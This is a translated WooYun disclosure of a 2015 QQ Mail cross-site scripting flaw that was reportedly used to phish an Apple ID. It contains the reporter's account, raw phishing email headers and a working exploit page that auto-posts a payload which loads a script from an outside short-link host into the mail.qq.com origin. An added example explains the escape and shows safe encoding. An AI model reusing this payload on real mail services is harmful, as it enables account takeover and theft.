
Vulnerability summary

Defect ID: wooyun-2015-0165343

Title: A QQ Mail XSS the black market is using: one click and they are in your mailbox (iCloud theft rings are using this vulnerability right now)

Vendor: Tencent

Author: 路人甲

Submitted: 2015-12-28 10:56

Fixed: 2016-02-09 23:29

Published: 2016-02-09 23:29

Type: XSS (cross-site scripting)

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-28: Details sent to the vendor, awaiting vendor handling
2015-12-28: Vendor confirmed; details disclosed to the vendor only
2016-01-07: Details disclosed to core white hats and experts in the relevant field
2016-01-17: Details disclosed to regular white hats
2016-01-27: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public

Brief description:

This happened on the evening of 27 December 2015. Galaxy Security Lab said Tencent had already fixed this vulnerability,
but the problem still occurred. My wife's iPhone 6 was stolen; she then got another iPhone 6 and kept using it. The Apple ID was not changed, the password was changed, two-step verification was not enabled, and the rescue email address was a QQ mailbox.

Detailed description:

At the start of December my wife lost her phone. We reported it to the police, put it in Lost Mode, and then got another iPhone 6 to use with the same ID; later we found that two-step verification had not been set up. The Apple ID is a Microsoft mailbox; the rescue email is a QQ mailbox.
At first the scammers sent all kinds of phishing SMS, which we ignored. Then around the middle of the month I saw a notice that the iPhone had entered Lost Mode, and when I went into Find My iPhone it showed as offline and I could not use the location history. I guess they flashed it and powered it on in the middle of the night and obtained the Apple ID and the rescue email. After that all kinds of phishing emails arrived, some to the Microsoft mailbox and some to the QQ mailbox.
One day the QQ mailbox received an email from someone claiming to have bought a phone; the body was actually just an image. My wife forwarded it to me right away. I clicked the image link on my computer and nothing happened, so I did not pay any attention to it. The text on the image said there was a link to photos from your phone, and it left a QQ number... I added him from my own QQ and he ignored me.
On the evening of the 27th I remembered this and used the QQ app on my wife's iPhone to add his QQ. He accepted immediately and sent a message saying "we received your phone, the two links below are the photos and a Taobao link". Without paying attention I tapped one; I figured that as long as I did not enter anything and did not download anything there was not much he could do.
But a minute or two later a system prompt appeared asking for the Apple ID password to be re-entered; I opened Find My iPhone straight away and the password was wrong. I then used another device to reset the password immediately via the security questions, and the lost device had disappeared from Find My iPhone...

Proof of vulnerability:

Screenshot of the email as displayed:

G3Vjq.png


The link behind the image is: http://dwz.cn/2lVGYb
The full email follows.
I have already deleted that person on QQ, so I can no longer find the chat log...

X-QQ-FEAT: KC9GRaXB0Gq8E0BT6WVJjWFWHRWeUg99DKTctka+kmk4BDy/C3kdJmu3MPVS8
2Ffd+pOnuB+6LC419RHGcPx5Ghkcu8K6jX2SuXYAhLvQ4zt9G0V9mdMLQNfb4e07ewNr17r
zrvMCBBmK4rhn2AZw2xBnL5wYx9TuFhAW7oeofj5tRHJuWUMr0CsDNN8/bFDOLvWrrUcOU9
Cxqw5O9HTEuj7HyGl43GkZkREtfR+yfdH0jLHPpxYhawBK/8KP6oK6j3n1pDiQdusgD0stU
x9GTP4RDSgl2HA2d79lKII6/w=
X-QQ-SSF: 00010000000000F000000000010000Z
X-HAS-ATTACH: no
X-QQ-BUSINESS-ORIGIN: 2
X-Originating-IP: 120.236.111.136
X-QQ-STYLE:
X-QQ-mid: webmail515t1450923070t8164389
From: "=?gb18030?B?TG9sYc+y0e7R7g==?=" <287611272@qq.com>
To: "=?gb18030?B?SEVSTw==?=" <6705905@qq.com>
Subject: =?gb18030?B?16q3oqO6NzM3MDg0MDk2McTjtcQgytYnu/ogw9w=?=
=?gb18030?B?wuvL+MHL?=
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_567B543D_0B413360_398B6EF8"
Content-Transfer-Encoding: 8Bit
Date: Thu, 24 Dec 2015 10:11:09 +0800
X-Priority: 3
Message-ID: <tencent_5D676DB01E78428A3589BDEC@qq.com>
X-QQ-MIME: TCMime 1.0 by Tencent
X-Mailer: QQMail 2.x
X-QQ-Mailer: QQMail 2.x
This is a multi-part message in MIME format.
------=_NextPart_567B543D_0B413360_398B6EF8
Content-Type: text/plain;
charset="gb18030"
Content-Transfer-Encoding: base64

------=_NextPart_567B543D_0B413360_398B6EF8
Content-Type: text/html;
charset="gb18030"
Content-Transfer-Encoding: base64

------=_NextPart_567B543D_0B413360_398B6EF8--


Exploit code:

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>test</title>
</head>
<body>
<script>
  // Build a hidden form and auto-submit it as a POST to the QQ Mail login CGI.
  // The victim only has to load this page (for example by tapping the link sent over QQ).
  function test(PARAMS){
    var temp = document.createElement("form");
    temp.acceptCharset = "utf-8";
    temp.action = 'http://mail.qq.com/cgi-bin/login';
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
      // A textarea carries the raw payload without any attribute-level encoding.
      var opt = document.createElement("textarea");
      opt.name = x;
      opt.value = PARAMS[x];
      temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
  }
  // The `domain` value is reflected into the login page's inline script with
  // insufficient escaping: it closes the string and the <script> element, then
  // loads the attacker's script from http://t.cn/R4Zns84 in the mail.qq.com origin.
  test({
    uin: 'aaaa',
    domain: 'bbbb";return false;\"</script><script src=http://t.cn/R4Zns84></script>',
    aliastype: 'other',
  });
</script>
</body>
</html>


Test result:

F3F6BA56-0D9E-4569-B432-ADC9202851BD.png
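The following is an added example, not code from the report, from 路人甲 or from Tencent. It shows in JavaScript why the `domain` value in the exploit above escapes an inline script block and what correct encoding of such a value looks like. The real server-side template behind mail.qq.com/cgi-bin/login is not public; `renderVulnerable()` is an assumed minimal reproduction of the pattern the payload is built for (a JavaScript string literal inside `<script>` where only double quotes are backslash-escaped; the `\"` in the payload exists precisely to neutralise that backslash). The function names, the `renderHardened()` encoding and the tiny script tokeniser are the example's own; the remote script URL http://t.cn/R4Zns84 is taken from the report's payload.

```javascript
// Added example (not code from the report or from Tencent): why the `domain`
// parameter escapes an inline <script> string, and how a server must encode it.
// renderVulnerable() is an ASSUMED reproduction of the pattern the payload targets.

// The payload from the report's exploit page, with HTML entities decoded.
const PAYLOAD =
  'bbbb";return false;\\"</script><script src=http://t.cn/R4Zns84></script>';

// ASSUMED vulnerable renderer: the value goes into a JS string literal and only
// double quotes are backslash-escaped. That defeats the `";return false;` part of
// the payload, but the HTML tokenizer ends a <script> element at the first
// "</script>" regardless of JavaScript string state, so the attacker's second
// <script src=...> becomes a separate element and is loaded by the browser.
function renderVulnerable(domain) {
  const quoted = domain.replace(/"/g, '\\"');
  return '<html><body><script>\nvar domain = "' + quoted + '";\n</script></body></html>';
}

// Hardened renderer: serialise as a JSON string literal (quotes, backslashes and
// control characters escaped), then replace the characters that matter to the
// HTML tokenizer and the two JS line terminators with \uXXXX escapes. The literal
// can then never contain "<", so "</script>" cannot appear inside it.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(domain) {
  return '<html><body><script>\nvar domain = ' + jsStringLiteral(domain) + ';\n</script></body></html>';
}

// Minimal stand-in for the browser's script tokenisation: every "<script ...>"
// up to the next "</script>" is one script element. Returns the src attribute
// (null for inline scripts) and the inline body of each element.
function scriptElements(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']?([^\s"'>]+)/i.exec(m[1]);
    out.push({ src: src ? src[1] : null, body: m[2] });
  }
  return out;
}

// Evaluate the first inline script the way the victim's browser would and return
// the value of `domain`, or null if the script does not parse. new Function is
// used only because this is a self-contained demonstration.
function domainSeenByBrowser(html) {
  const inline = scriptElements(html).find((s) => s.src === null);
  if (!inline) return null;
  try {
    return new Function(inline.body + '\nreturn domain;')();
  } catch (e) {
    return null;
  }
}

// Summarise what each renderer does with a given value.
function compare(domain) {
  const v = scriptElements(renderVulnerable(domain));
  const h = scriptElements(renderHardened(domain));
  return {
    vulnerableScripts: v.length,
    vulnerableExternal: v.filter((s) => s.src !== null).map((s) => s.src),
    hardenedScripts: h.length,
    hardenedRoundTrips: domainSeenByBrowser(renderHardened(domain)) === domain,
  };
}

console.log(compare(PAYLOAD));
// vulnerable: 2 script elements, the second loading http://t.cn/R4Zns84
// hardened:   1 script element, and `domain` is exactly the submitted value
```

Run it with node. The lesson of the `</script>` half of the payload is that escaping quotes, or even a correct JavaScript string escape that leaves `<` alone, is not enough: the HTML tokenizer closes the script element first, before any JavaScript is parsed. Either encode the value so it cannot contain `<` (as `jsStringLiteral` does), or keep user data out of inline scripts altogether and pass it through a `data-` attribute or a `<script type="application/json">` element that the page reads at runtime.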

Fix recommendation:

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 1

Confirmed: 2015-12-28 17:23

Vendor reply:

Thank you very much for your report. Another white hat has already reported this issue to the Tencent Security Response Center, and we are actively working on a fix. If you have any questions, please let us know and a dedicated person will follow up.

Latest status:

None